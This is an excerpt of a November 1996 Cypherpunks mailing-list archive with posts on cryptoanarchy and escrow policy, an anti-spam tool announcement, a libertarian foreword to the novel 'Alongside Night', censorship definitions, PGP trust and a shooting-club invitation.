Constitutional procedures with each one.

Witch hunts and random searches will occur if there is large minority
devoted to pursuing cryptoanarchy and a majority which is just as
strongly devoted to putting a stop to it.

It is not one hundred percent clear to me that the operation of
cryptographic software is speech.  The software certainly does
not add meaning to the messages you are sending.

Unfortunately, the term "free speech" is vague and confusing.  You
can broadcast any number you like, unless it happens to be the number
that corresponds to the Windows95 executable.  You can say anything
you like, but you can't say anything that is untrue about a private
person.  Where in the First Amendment is any distinction drawn between
public and private people?  Why am I allowed to say untrue things
about public figures?  And so on.

There are any number of ways to make the possession of cryptographic
software illegal.  For instance, the government could change the
patent laws to make cryptography patents have a 100 year term.  (This
will be done to promote cryptography. ;-)  Then, after the evils
of cryptography are "discovered" the government can nationalize the
software patents and beef up the penalties for patent violations.

> But I think this "nightmare scenario" is implausible.

I agree.  The reason we have to consider this "straw man" is that it
is considered to be a legitimate policy discussion amongst people at
the highest levels of our society.

> And the points many of us have been making about digital commerce, the
> central role of the Net in so many things, and the international
> connections, mean that a pogrom launched against the Net just isn't going
> to fly. Too many corporate interests are at stake.

I agree with this, too.  I think a lot of people have been sitting on
the fence waiting to see which way the crypto ball is going to bounce.
I think it's going to bounce towards cryptoanarchy.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 8 Nov 1996 20:16:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Spam Hater: fight back the spammers
Message-ID: <Pine.3.89.9611082032.A7699-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


>From http://www.compulink.co.uk/~net-services/spam/

Hit back at the Spammers!

Get lots of e-mail offering you get-rich-quick schemes? Want to hit back? 
"Spam Hater" is free
Windows software that helps you respond effectively and makes it hot for 
these people.

   Analyses the Spam 
   Extracts a list of addresses of relevant Postmasters, etc. 
   Generates a "WHOIS" query to help track the perpetrator 
   Prepares a reply 
   Choice of legal threats, insults or your own message 
   Appends a copy of the Spam if required 
   Puts it in a mail window ready for sending 

Spam Hater works with lots of popular e-mail programs directly - there's 
no tedious cutting
and pasting. 

Supported E-Mail Programs

Ameol, AOL 2.5I, Eudora Light 1.5.2, 1.5.4, Eudora Pro 2.2, Free Agent 
0.99, Microsoft Internet
Explorer 3.0 (4.70.1155), Netscape 1.2N, 2.02, 3.0, Pegasus Mail V2.4X, 
Virtual Access V3.51.

Download here.. If you already have VBRUN300.DLL, save some time with the 
"lite" version. 


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Fri, 8 Nov 1996 17:19:23 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007803aea873ff3acc@[207.167.93.63]>
Message-ID: <199611090119.UAA01052@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


As a HP-35 buyer when they first appeared in '72, I sonn found it
simple to explain RPN by using a basic rule of good composition:
avoid passive voice.

The "+" key is not, of course "plus" rather it is the active voice
term "add" and such.. And all commands are "active voice" unlike
a TI where some were...

Of course, I soon found far too many people had no grasp of active
vs. passive voice........

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <jkenth@c2.net>
Date: Fri, 8 Nov 1996 19:38:57 -0800 (PST)
To: ecash@digicash.com
Subject: Alongside Night on the WWW [long]
Message-ID: <328407F3.1508@c2.net>
MIME-Version: 1.0
Content-Type: text/plain


The following article is the foreword to the new edition of
_Alongside Night_ by J. Neil Schulman, available for download in
HTML format from http://www.pulpless.com/nite.html . Permission
to cross-post in appropriate newsgroups, mail lists, and file
bases granted. Copyright (c) 1996 by J. Neil Schulman. All other
rights reserved.


                     Pulling Alongside Night
                 The Enabling Technology is Here
               by J. Kent Hastings (jkenth@c2.net)

     J. Neil Schulman is a prophet.

     Two weeks after his twenty-third birthday, on May 1, 1976,
J. Neil Schulman finished the first draft of _Alongside Night_, a
novel that accurately discerned the outline of 1996 reality. He
finished the final draft in 1978, for publication on October 16,
1979.

     _Alongside Night_ describes things that weren't around in
the '70s but arrived later, or are becoming commonplace now. 
"Citizens for a Free Society" could be the populist/libertarian
source group for today's Patriot movement. The "TacStrike"
division of the novel's Revolutionary Agorist Cadre could be
recruited from today's militias, revolutionaries, and
mercenaries, while today's cypherpunks could form the basis for
the novel's "IntelSec."

     In the future of _Alongside Night_ as in our own 1996 -- but
not in the 1970's when it was written -- panhandlers and the
homeless are omnipresent due to economic hardship, professional
youth gangs roam the streets of New York freely while big-time
drug and people smuggling are ubiquitous; videophones are hitting
the consumer market and computers are in use everywhere.

     Schulman's "First Anarchist Bank and Trust Company," a Swiss
bank subsidiary, uses accounts denominated in gold, linked
offshore -- a dream of today's cypherpunks. He predicts re-
prohibition of gold, with TV actors warning "that just one little
ounce of gold bullion can put you away in a federal penitentiary
for up to twenty years."

     Transportation to one of Schulman's "Agorist Undergrounds"
shields against all transmissions to prevent discovery of
location aboveground, including heartbeat detectors being put
into use in 1996 by the Immigration and Naturalization Service at
the Mexican border. Weapons, cameras, recorders, transmitters,
and radioactive materials are checked in transit.

     Security at the A.U. uses non-lethal weapons. Guards disarm
guests upon arrival, then return their guns on their way to the
trading floor. One shop is called "The Gun Nut," and "Lowell-
Pierre Engineering" sells nukes. Rental per-square-foot
calculates any risk of a government "G-Raid" against the costs of
security measures.

     Cadre General Jack Guerdon, also the builder of some A.U.s
including "Aurora," explains how the location of a large complex
could be kept secret from the construction workers:

          "They were recruited from construction sites all over
     the world, were transported here secretly, worked only
     inside, and never knew where they were. If you think
     security is tight now, you should have been here during
     construction; a mosquito couldn't have gotten in or out."


     Thinking about it now, robots with telepresence may achieve
the same security, with even less risk, since only Cadre
equipment would be inside.

     TransComm's smuggling of contraband predicted marijuana
traffic expanding into the sort of operation done in the 1980s by
the cocaine cartels, small airports and all.

     Aurora's trading floor offers non-prescription drugs,
marijuana, cocaine, heroin, and LSD sold in defiance of DEA and
FDA regulations, but with voluntary warning labels.

     Dialogue in _Alongside Night_ decries smoking prohibition at
the time of the story. In California today, you aren't allowed to
smoke in restaurants, workplaces, airports or other public
buildings. The U.S. FDA classified nicotine a drug this year, so
it's just a formality to prohibit delivery systems (cigarettes,
cigars, and pipes) nationwide as well.

     Classroom video intercoms exist in the novel, even before
consumer VCRs were a hot item. One of _Alongside Night_'s
characters, Chin, uses a video capable laptop in a sequence
written years before IBM introduced the first PC, and more years
before anything you could call a laptop.

     Consumer electronics? "Aurora's library had a fair
collection of books, videodiscs, and holosonic music cassettes"
-- years before DAT was introduced.

     All trading and billing is done by computer with access
controls, a projection made before most banks even had ATMs, much
less telephone bill-paying..

     Elliot chooses a pass phrase like today's PGP requires, and
the Cadre contract assures authorized disclosure only. Aurora's
hotel room keys are computerized in the novel, but it wasn't like
that at hotels in the 1970s. Also in Aurora, computer terminals
are in each hotel room.

     The electronic contract used by the Cadre in _Alongside
Night_ is imitated today by digital forms used millions of times
daily on the World Wide Web, including Schulman's own site
http://www.pulpless.com/.

     Schulman wrote the first chapters of the book in 1974,
describing his fictional economist "Martin Vreeland," winner of
the Nobel prize for economics -- two years before Milton Friedman
actually won his in 1976. And while Schulman did fail to predict
the collapse of the Soviet Union, his description of the almost
casual fall of the United States government over the two week
timespan in his novel parallels the bloodless coup attempt
against Gorbachev in 1992, which completed the fall of the Soviet
Union.

     Neil predicted Chinese Norinco handguns and rifles being
imported into the United States: Elliot Vreeland carries a ".38
caliber Peking revolver." Such imports were legalized after
Alongside Night was written and, after becoming popular items,
imports of Chinese firearms into the U.S. are now banned again.

     The Cadre are armed, but not on an aggressive revenge
mission against the feds, as a "drive-by" with a non-lethal,
temporarily-blinding magnesium flash, used to evade a FBI sedan,
demonstrates.

     Foreigners with hard currency buy relatively cheap U.S.
assets in_ Alongside Night_, before Rockefeller Center or major
portions of the entertainment industry were bought by Japanese
conglomerates. Schulman predicts the "mall-ization" of America
because of fear of crime on city streets, and police replaced
with private patrols such as "Fifth Avenue Merchant Alliance
Security (FAMAS)."

     "Air Quebec" indicates Schulman's prediction of Quebec
secession, which seems likely soon after a fifty-fifty split in
the last election to test the issue. The secession of Texas
doesn't seem as far-fetched these days as it did in 1976.  Just
think of the Montana legislators who introduced a bill to secede
a couple of years ago.

     Schulman's novel is set during the final two weeks of a
catastrophic "wheelbarrow" inflation. Confiscatory taxes have
forced people out of aboveground jobs and into either working
"off the books," or unemployed on the dole. Gresham's Law has
Americans  using blue "New Dollars": "More than anything else, it
resembled _Monopoly_ money"; and fixed-value coins disappear so
fast for their metallic value that vending-machine tokens fixed
daily to the price of the "eurofranc" are just about the only
real money in circulation.

     The President complains about the U.S. being treated like a
banana republic by the "European Common Market Treaty
Organization, a combination of the European Common Market and a
U.S.-less NATO," the U.S. having been kicked out for no longer
being able to afford keeping overseas troop commitments. The
Chancellor of EUCOMTO informs the White House, "Mr. President,
even bananas do not decay as quickly as the value of your
currency these past few months." In the 1970's, the European
Union was not yet negotiated and NATO was still almost entirely
controlled by the United States.

     In _Alongside Night_, political dissidents are arrested on
secret warrants, and the FBI gulag they're stuck in (codenamed
"Utopia") is blown up by the feds as a cover-up. Of course,
nothing like that could ever happen in real life, right? 

     Schulman's account of a Federal Renovation Zone rebuilding
Times Square in N.Y. predicts today's sweeping federalization of
lands, opposed by the sagebrush rebellion.

     Future conflict between militias and the feds seems
inevitable today since both sides see the other as a fatal threat
and neither side is backing down. An Oracle headline in
_Alongside Night_: "FBI Chief Powers attributes last night's
firebombings of bureau offices to outlaw 'Revolutionary Agorist
Cadre.'" The recent FBI raids in Colorado and West Virginia
against militia groups supposedly planning terrorism -- not to
mention Waco and Ruby Ridge -- demonstrates that anti-federal
sentiment isn't laughed off as harmless anymore.

     The FBI chief in the novel keeps copies of "confidential"
enemies lists at home, long before Filegate. In the 1970's when
J. Neil Schulman wrote his novel, the general image of the FBI
was Efrem Zimbalist, Jr., on _The FBI_. Today's FBI is better
characterized by the paranoia of _The X-Files_, where higher-ups
are usually in complicity with dark forces.

      The Emergency Broadcast System in _Alongside Night_ extends
even to telephones -- using the phone system during the crackdown
requires authorized beepers -- while radio and TV programming
simulates normality while the government collapses. Today's FBI
digital wiretap law will provide capability for millions of
simultaneous wiretaps and the major broadcast networks have
accepted official explanations uncritically of everything from
who started the fire at Waco to the cause of the explosion that
destroyed TWA Flight 800.

     In _Alongside Night_, we learn that a _New York Times_
front-page story headlined "Vreeland Widow Assures Public Husband
Died Naturally" is disinformation. Echoes of Vince Foster and the
Arkancides?

     An "Oracle" headline in _Alongside Night_ predicts military
dissent: "TEAMSTER PRESIDENT WARNS POSSIBILITY OF ARMED FORCES
WILDCAT STRIKES IF PENTAGON DOES NOT MEET DEMANDS..."  And when
-- due to a busted budget -- an absence of government paychecks 
combines with the latest government scandal, a two-century-old
superpower collapses like a house of cards.

     Where did a prediction of revolution in the U.S. come from,
if not the fevered dreams of a militant paranoid? Young Schulman,
a student of Austrian economics, just "followed the money,"
determining who would earn it and who would control it.

     During the 1970s, hippies dropped out and moved to communes,
while tax and sagebrush rebels fought to keep the government out
of their pockets and off their lands. California's Proposition 13
and the election of U.S. President Ronald Reagan were the results
of the establishment co-opting anti-government positions.

     Despite this, the current political situation in the U.S. is
more volatile than ever. Job security doesn't exist for anybody,
so leftists are forming new parties out of disgust with the
Democrats, while right-wingers who believe Republicans
indistinguishable join militias.

     But perhaps the most revolutionary development is the
Internet and the World Wide Web, which threaten government
currency controls, tax collection, and media restrictions.

     _Alongside Night_ predicted revolutionary cadres organizing
to resist and replace the State with an "agorist" society.
Agorism, according to Samuel Edward Konkin III, who coined the
term, is the integration of both libertarian theory and counter-
economic practice, neither inactive "library libertarians"
prattling on with their idle complaints, nor simple criminals
preying on society.

     Agorists insist on both civil and economic liberties for all
individuals, encourage efficient restitution for contract and
rights violations, yet oppose a monopoly of coercion from even a
limited "minarchist" State.

     From Konkin's _New Libertarian Manifesto_: "Coercion is
immoral, inefficient and unnecessary for human life and
fulfilment." This is not pacifism because defensive violence is
not coercion. Coercion is the _initiation_ of violence or its
threat. You can't morally start a fight, but you can finish one.
... "When the State unleashes its final wave of supression--and
is successfully resisted--this is the definition of
_Revolution_."

     Most citizens go along with the government, whether "right
or wrong," to preserve order, defend freedom, and more recently
to assist the poor and protect the environment. When it becomes
obvious that the government is hostile to these purposes, many of
its subjects will no longer feel guilty about joining the radical
opposition.

     A rich, slave-owning, dead European white male cracker named
Thomas Jefferson (sorry, he's not "the Sage of Monticello"
anymore), wrote similar things about King George III in the
_Declaration of Independence_.

     I'm sure T.J.'s writings would be found in Aurora's library,
along with the following titles, most of which are specified in
_Alongside Night_. Productive workers will "withdraw their
sanction," according to Ayn Rand's 1957 _magnum opus_, _Atlas
Shrugged,_ and this will lead to "the collapse of the Looter's
State." Rand also described an underground "Galt's Gulch" of
black market revolutionaries in her classic novel. Murray
Rothbard hinted at stateless defense in _Man, Economy, and State_
(1962). Robert Heinlein portrayed a stateless legal system and
revolution in _The Moon Is A Harsh Mistress_ (1966). Rothbard
describes stateless defense services fully in _Power and Market_
(1970), echoing Gustavus De Molinari's 1849 essay "The Production
of Security."

     Molinari was an economist in the original French _laissez-
faire_ school of Frederick Bastiat. Molinari concluded that
justice and defense were goods like any other, best provided in a
competitive market rather than political monopoly. Konkin's _New
Libertarian Manifesto_ (published in 1980, based on a talk given
in February 1974 which influenced _Alongside Night_) inspired the
creation of The Agorist Institute, "symbolically founded on the
last day of 1984," now with a web site at http://www.agorist.org/.

     That's all fine for free-market supporters, but wouldn't
"progressive" groups try to impose their own one-party
dictatorships? What's in it for the masses?

     Despite their famous friendship with Newt Gingrich, Alvin
and Heidi Toffler are active in labor and ecology circles. They
point out that telecommuting is 29 times more efficient than
physical commuting in private cars. If 12% telecommuted, the 75
million barrels of gasoline saved would completely eliminate the
need for foreign oil and future Gulf Wars. Real estate now used
for office space could be used for local housing. The Tofflers
believe traditional factors of production such as land, labor,
and capital are being dwarfed by the growing importance of
information. Information is inexhaustible, it can be shared but
still kept.

     Widely copied software brings more user suggestions and
faster improvements. It puts scarcity economics on its ear.
Expensive bulky production methods are being "ephemeralized" (to
use a term coined by Bucky Fuller), replaced by flexible cheap
computers to satisfy local consumer tastes. More people can
afford access to computerresources, with less damage to the
environment.

     Telecommuting is safer than driving, which currently kills a
Vietnam War's worth of fatalities each year, without requiring
"strategic" resources to fight over. Silicon comes from sand,
which is plentiful. Because programs like PGP protect users from
both evil hackers and a fascist global police state, traditional
leftists embrace the new technology, and even build their own web
sites.

     Karl Marx wrote of objective and subjective conditions being
necessary for Revolution. "Objective" in this case means the
physical ability to overthrow the current regime. "Subjective"
means the desire and mass support to do it.

     The 1960s arguably provided the subjective conditions: an
unpopular war, a vicious police crackdown on agitators, and
hundreds of thousands of protesters marching in the streets. But
these subjective conditions weren't perfect. The economy was
still robust, not yet weighed down with the debts racked up in
the 1970's by the Wars On Poverty and Vietnam, and no stagflation
and oil crisis yet. The objective conditions were bad.
Individuals and small groups could not do much mischief without
being overwhelmed by Chicago police or National Guard troops
thrown against them.

     Today, a single troublemaker can afford to sign up for
Internet service under a pseudonym and use anonymous remailers to
post messages in widely read "newsgroup" conferences, distributed
to more than 135 countries without identification.

     The Rulers and the Court Opinion Makers won't let their ill-
gotten monopolies collapse without a fight. Every day we hear
about the Four Horsemen of the Infocalypse: Terrorists,
Pedophiles, Money-Launderers, and Drug Smugglers. Defenders of
privacy and free speech on the Internet get smeared for "fighting
law enforcement" just like the Revolutionary Agorist Cadre in
_Alongside Night_.

     Restrictions on the Internet are likely to be passed for
"crime and security" reasons and to hold users "accountable."
Civil libertarians complain that such pornographically-explicit
words as "breast" are being filtered by online services fearing
prosecution, with the "unintended consequence" of forcing breast
cancer survivors to choose euphemisms like "tit".

     Critics of data censorship say these restrictions are like
trying to stop the wind from crossing a border. For example, when
France (in anti-_laissez-faire_ fashion) blocked some newsgroups,
an ISP in the United States, http://www.c2.net/, made them
available to French users via the World Wide Web.

     Next there's the problem of how to make a living
underground. Schulman watched Anthony L. Hargis found a "bank
that isn't a bank" in 1975, with "transfer orders" instead of
checks, denominated in mass units of gold. ALH&amp;Co. survives
to this day, despite IRS inspections, hassles with the Post
Office and local authorities, and ever-tighter banking
restrictions against "money-laundering."

     Hargis explicitly forbids (by voluntary contract) his
account holders from selling drugs, which suggests how
proprietary communities can choose to be drug-free within a
future agorist society. Hargis is sincere in this restriction,
not just playing clean to fool the authorities. Unfortunately,
Hargis is not enthusiastic about encryption or the Internet.
"Honest Citizens have nothing to hide."

     Rarely does the weed of government research bear anything
but the bitter fruits of mass destruction, disinformation, and
bureaucratic disruption of innocent people's lives. Exceptions
may include public-key cryptography, spread-spectrum radio and
the Internet Protocol.

     Programmers such as Pretty Good Privacy (PGP)'s Philip R.
Zimmermann are using the government sponsored RSA algorithm to
thwart the efforts of every State's security agent. In Myanmar
(formerly Burma), where PGP is used by rebels fighting
dictatorship, the mere possession of a network-capable computer
will bring a lengthy prison sentence.

     In 1995, David Chaum announced the availability of
untraceable digital cash ("Ecash"), denominated in U.S. Dollars
(Federal Reserve Units, or "frauds" as Hargis would call them)
from Mark Twain Bank in St. Louis, MO.

     Ecash can be withdrawn, deposited, and spent without fee
anywhere on the Internet. The only charge is when exchanging
Ecash for a particular currency. Chaum lives in Amsterdam, the
location of the "secret annex" in _The Diary of Anne Frank_.

     During World War II, the Nazis seized the government records
in Amsterdam before partisans could burn them, and used them to
track down and kill Jews, including members of Chaum's own
family. Perhaps this explains his desire for computer privacy.

     In 1985, David Chaum described his invention in an article
as "Security Without Identification: Transaction Systems To Make
'Big Brother' Obsolete." Ecash protects privacy yet thwarts
deadbeat counterfeiters. Similarly, software filters against
"spam" and other unwanted messages obviate a State crackdown
against anonymity.

     Chaum's Digicash company now serves a number of banks in
different countries, and provides the "electronic wallet"
software for use by their account holders. With Ecash, items may
be purchased without identifying the buyer, even if the banks and
merchants exchange information, but the seller may be disclosed
if the buyer wishes to publicly dispute a purchase. As it exists,
privacy is compromised because of bank disclosure requirements,
but it isn't hard to imagine underground banks with unofficial
ecash (as opposed to proprietary Ecash), using their own currency
or gold.

     Respecting your right to be secure in the privacy of your
own home would let you advertise, send catalogs, take orders,
send processed data or tele-operate machinery (in other words, do
your _work_), then send invoices, collect ecash payments, and
deposit your unreported earnings scot-free in offshore accounts.
Using ecash and encrypted remailers, there would be no way for
tax collectors to tell if you made $100 last year or
$100,000,000.

     If measures such as mandatory internal passports and routine
checkpoints can't restrict who can work or determine accurate
income taxes due, they'll have to employ ubiquitous
surveillance--a totalitarian system will be the only way to
protect the privileges of the tax eaters. Although necessary for
the future survival of the State, a crackdown will provoke
resistance. Private communications bypass official propaganda, as
the Committees of Correspondence did during the American Revolution.

     They'll be forced to bug your house. Don't worry, the
automatic image-processing (exists today!) 24-hour cameras will
be labeled "for your protection." Worse than Orwell's _1984_,
they won't need humans to look through them, they'll identify
everyone and trace their movements with blessed convenience.

     Couldn't they just tap the phones? Sure, but with encrypted
data to and from an Internet Service Provider they wouldn't get
much. Couldn't they require back-door "escrowed" keys and outlaw
strong encryption? Not good enough, they need _constant_
monitoring (not just with a court order) to collect taxes.

     Scofflaws might send innocent looking images and sound files
with steganographically hidden data using methods designed to
thwart detection and disruption. In 1996, for real, any data
collected about you can be shared with the FBI, U.S. Customs,
DEA, IRS, Postal inspectors, and the Secret Service because the
Financial Crimes Enforcement Network (FinCEN), located down the
street from the CIA in Vienna, Virginia pools the data. I guess
anything goes to stop crime and protect the children, right?

     In _Alongside Night_, temporary relays and infrared
modulation of engine heat disguises communication signals. With
enhancement of spread-spectrum radios recently introduced, a
channel wouldn't be defined by a single radio frequency, but by a
"spreading code" of frequency hops with staggered dwell times, so
that jammers and eavesdroppers won't be able to predict where,
and for how long, the carrier will go next.

     A hybrid with the direct sequence technique would mix each
bit of the message with several pseudo-random "chip" bits, to
spread the signal at each hop. A transmitted reference in one
band, of purely random thermal noise in a resistor for example,
can be compared to the reference mixed with a message in another,
so that the authorized receiver correlates the two to recover the
message.

     Low-powered microwave, lasers, unreported underground
cables, antennas disguised as flag poles and many other methods
would insure that the email got through during a blackout.

     Today, when "rightsizing" has made a temporary placement
firm the largest employer in the U.S., and the President's own
budget projects a federal tax rate of 84%, not including state,
county, city and other local taxes, we can count on greater
numbers swelling the ranks of radical movements in the face of a
hostile establishment.

     "Dr. Merce Rampart," the woman leading Schulman's Cadre,
offers advice to dislocated personnel in the "New Dawn" of a
proprietary anarchist revolution:

          "With the exception of those government workers who
     perform no marketable service--tax collectors, regulators,
     and so on--we are urging them to declare their agencies
     independent from the government, and to organize themselves
     into free workers' syndicates. Shares of stock could be
     issued to employees and pensioners by whatever method seems
     fair, and the resultant joint-stock companies could then
     hire professional managers to place the operation on a
     profitable footing. I can envision this for postal workers,
     municipal services, libraries, universities, and public
     schools, et cetera. As for those civil servants whose jobs
     are unmarketable, I suggest that most have skills in
     accounting, administration, computers, law, and so forth,
     that readily could be adapted to market demand. That's the
     idea. It's now up to those with the necessary interests to
     use it or come up with something better."


     In the 1980's, after _Alongside Night_ was published, this
idea became popular among libertarian-leaning conservatives. It's
called privatization.

     _Alongside Night_ shows us a world where such ideas aren't
merely a smokescreen for greater efficiency in the service of an
ever more encompassing State.

                               ##

J. Kent. Hastings is co-director of the Agorist Institute
(http://www.agorist.org), a partner in the Pulpless.Com online
publishing venture (http://www.pulpless.com), a long-time
cypherpunk, and radical activist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Fri, 8 Nov 1996 17:39:56 -0800 (PST)
To: ericm@lne.com (Eric Murray)
Subject: Re: WebTV a "munition"
In-Reply-To: <199611081616.IAA21577@slack.lne.com>
Message-ID: <199611090139.UAA01155@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray sez:
> 
> 
> 
> Page 3 of the San Jose Mercury News has a small blurb
> about WebTV's browser/set-top box ......

That's a John Markoff story in today's NYT.....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 8 Nov 1996 18:47:16 -0800 (PST)
To: bryce@digicash.com
Subject: Re: Need a new word for non-violent-censorship
In-Reply-To: <199611081134.MAA16008@digicash.com>
Message-ID: <199611090303.VAA00236@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> I often have the same difficulty when speaking with
> Objectivists.  They define "censorship" as "silencing the
> speaker by force", which is a fine and useful definition, but
> suppose we want to talk about a similar phenomenon which does
> not involve force?  For example, the magnate who owns all the
> newspapers, television stations, bookstores and movie theatres
> in a small town decides that never again will homosexuality be
> publically mentioned in any of these venues.  Force?  No.
> "Censorship"?  Not by _that_ definition, but what _is_ it?

     "Monopoly", or editorial policy and it is solved by buying a press of 
some kind, from a letter press to a photocopier, and printing all the news 
he does, and doesn't.

> We need a new word, or else we have to continue using

     No, we just need to use the words we have properly. 

> "censorship" to mean both of those things.  I sometimes use
> "violent-censorship" and "non-violent-censorship" in
> conversation.

     "Violent-censorship" is when you [shoot beat kill] the speaker, "non-
violent" is when you imprison, or consficate the means of speech/replication of 
speach, or otherwise "silence" without physcial force. Then you have censorship 
by intimidation, which is a little harder to qualify. If I threaten to burn 
your press if you talk about Crypto, or print Crypto algorythms, is that 
censorship? IMO, yes. If you _choose_ not to discuss Crypto because you 
understand (or are afraid of) the implications of it, that is NOT censorship,
any more than my refusal to discuss sports because I can't understand the appeal
or because I think that sports are generally a bad thing.  
 
     Choice is not censorship, removal of choice is. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 8 Nov 1996 18:38:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [rant] Race
Message-ID: <9611090217.AA03784@super.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Nov 08 21:16:34 1996
 
> ObCrypto: Is it true that "Kemo Sabe" is Abanake for "Horse's Ass"?

The author had some fun with their names.  Kemo Sabe is a play on words and 
actually stands for "que no sabe" which, translated from Spanish, means "he 
who knows nothing."  Tonto in Spanish means stupid.
 


************************************************************
Lynne L. Harrison, Esq.       |    "The key to life:
Poughkeepsie, New York        |     - Get up;
lharrison@mhv.net             |     - Survive;
http://www.dueprocess.com     |     - Go to bed."
************************************************************

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoPpgj5A4+Z4Wnt9AQFHsgP5AVSS0pG5Sp2VqtTm+BefXkA9IcA//LvQ
IXISs4RaLUrUmPjMkggFbyoMEEmIIz2TjdUr2Rjn+0+T/8cmSSXTrUqofroOu8rC
G00MlCPGzLWuQ5g3iuxGfxZMszWuYWEkb7m37nP0ozdPgR3xG6sYkAeuTPiny27x
ZXXPgmMbidU=
=m/jZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 8 Nov 1996 19:02:42 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Validating a program
In-Reply-To: <328353D8.4D28@gte.net>
Message-ID: <199611090318.VAA00266@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Dale Thorn wrote:
>>|Adam Shostack wrote:
>>|put the sender in any great danger, but when the application is really serious, as it
>>|always is sooner or later, you must realize that people could be taking great risks
>>|with PGP encryption, and "pretty sure" isn't good enough when it's really, really
>>| vital to have bulletproof security.

     If it is vital to have bulletproof security, then they will:
      1) learn Cryptography and C well enough to read the code themselves.
      2) hire an expert to do 1). 
      3) Do the research and purchase a commercial package that has 
         guarentees and recommendations. 

>>        You're wrong.
>>        People can make their own choices about what level of risk
>>they're willing to accept.  That they make bad choices is not my
>>problem, except when they're paying for my opinion.
>It's easy to say, but when the "shit comes down" as they say, the average user is
>going to swear they had assurance PGP was absolutely secure, etc....

     If you believe that _anything_ is absolutely secure, you get what you 
diserve. It would seem far far cheaper to simply insert a couple extra chips
in the form of a tap in your keyboard to trap all of your keystrokes & forward
them via radio signals, or to rubber hose you. 

     PGP has been looked over by lots of people, so I trust it not to have 
any deliberate holes. As to bugs, or accidental errors, well, it is "freeware,
you get what you pay for. Sometimes you get more, and I am not denegrating 
PGP, but if you don't pay for it you shouldn't even expect it to keep working,
much less be bug free. This comes from someone whose main computer rarely 
runs commercial software (hey, free games just aren't as cool as the commercial
ones). 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 21:34:01 -0800 (PST)
To: Matthew Ghio <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b03aea9c3897878@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:41 PM 11/8/1996, Matthew Ghio wrote:
> If, as is presumed in this discussion, society will become divided into
> two somewhat distinct groups of people, the crypto-anonymous group and
> the traceable-identifiable group, then the predictable outcome is that
> members of the traceable-identifiable group will become increasingly
> victimized by members of the crypto-anonymous group.  People who are
> easily identifiable and tracked are easy prey.

If people feel they have to go "underground" in order to protect
themselves, you will see near unanimous support for mandatory GAK.
This qualifies as a nightmare scenario for almost everybody, even
many of the readers of this list.

Universal traceability and identifiability is not necessarily a
consequence of GAK.  By universal I mean "available to everyone."
Were this to be a problem, the information would be confined to
"responsible" parties.  I think I can describe a way to do this in
nearly every scenario.  There is certainly no reason why driver's
license data need be on the Web.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 8 Nov 1996 21:54:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Announcement] Cypherpunks Shooting Club
Message-ID: <Pine.3.89.9611082125.A13815-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


By popular request, I am following up on the three year old idea of the 
Cypherpunks Shooting Club. All Cypherpunks in the San Francisco Bay Area 
interested in participating are welcome to contact my by email. If enough 
individuals wish to participate, the first practice session 
will be held at the United Sportsmen Rifle Range in Concord this Sunday.

Bring your own firearm or use one of the ones provided.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Fri, 8 Nov 1996 19:21:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Source blocking Vulis is futile
Message-ID: <9611090309.AA05396@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


John Anonymous MacDonald wrote:
>
> Please, remailers, source block Vulis for a week.
> Remailer Fan
>

